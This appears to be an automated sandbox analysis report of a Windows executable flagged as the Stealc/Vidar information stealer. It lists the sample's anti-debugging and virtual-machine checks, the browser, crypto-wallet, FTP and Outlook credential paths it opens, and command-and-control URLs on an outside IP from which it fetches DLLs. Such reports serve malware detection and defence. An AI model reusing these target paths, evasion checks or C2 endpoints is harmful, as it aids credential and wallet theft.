Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0025ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00264570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00264570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0025DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00251160 GetSystemInfo,ExitProcess,

0_2_00251160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW1
Source: file.exe, 00000000.00000002.1936049768.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1936049768.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59254
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58068
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58065
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58079
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58119
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58087

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C615FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C615FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_002545C0 VirtualProtect ?,00000004,00000100,00000000

0_2_002545C0

Source: C:\Users\user\Desktop\file.exe

0_2_00269860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00269750 mov eax, dword ptr fs:[00000030h]

0_2_00269750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00267850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00267850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C5EB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C5EB1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 6632, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00269600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00269600

Source: file.exe, file.exe, 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: eProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C5EB341 cpuid

0_2_6C5EB341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00267B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00266920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00266920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00267850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00267850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00267A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00267A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1936049768.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1659118085.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 6632, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: \Electrum\wallets\
Source: file.exe	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe	String found in binary or memory: \Electrum\wallets\
Source: file.exe	String found in binary or memory: window-state.json
Source: file.exe	String found in binary or memory: Jaxx Desktop (old)
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe	String found in binary or memory: info.seco
Source: file.exe	String found in binary or memory: ElectrumLTC
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe, 00000000.00000002.1936049768.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.jsonX
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: multidoge.wallet
Source: file.exe	String found in binary or memory: seed.seco
Source: file.exe	String found in binary or memory: keystore
Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.$

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1936049768.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6632, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1936049768.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1659118085.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6632, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 6632, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37	100%	Avira URL Cloud	malware
http://185.215.113.37/	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/sqlite3.dll8	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpq	100%	Avira URL Cloud	malware
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
Http://185.215.113.37/e2b1563c6670f193.phption:	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpr	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php~	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	Avira URL Cloud	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Visual	0%	Avira URL Cloud	safe
http://185.215.113.37e2b1563c6670f193.phption:	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpx	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpser	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dllw	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dllf	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpf	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.php	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dll/	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpj	100%	Avira URL Cloud	malware
http://185.215.113.37tE	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpM	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpdll	100%	Avira URL Cloud	malware
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://185.215.113.37/#	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpV	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/freebl3.dllz	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpZ	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	Avira URL Cloud	malware
https://ac.ecopnacl	0%	Avira URL Cloud	safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpB	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpe950	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php1	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php:	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php&	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php3	100%	Avira URL Cloud	malware
https://ac.ecop	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/mozglue.dll.	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	FBFCAKKK.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	JJECGCBGDBKJJKEBFBFHJEBGDG.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, FBFCAKKK.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1953958694.0000000029281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFB.0.dr	false	URL Reputation: safe	unknown
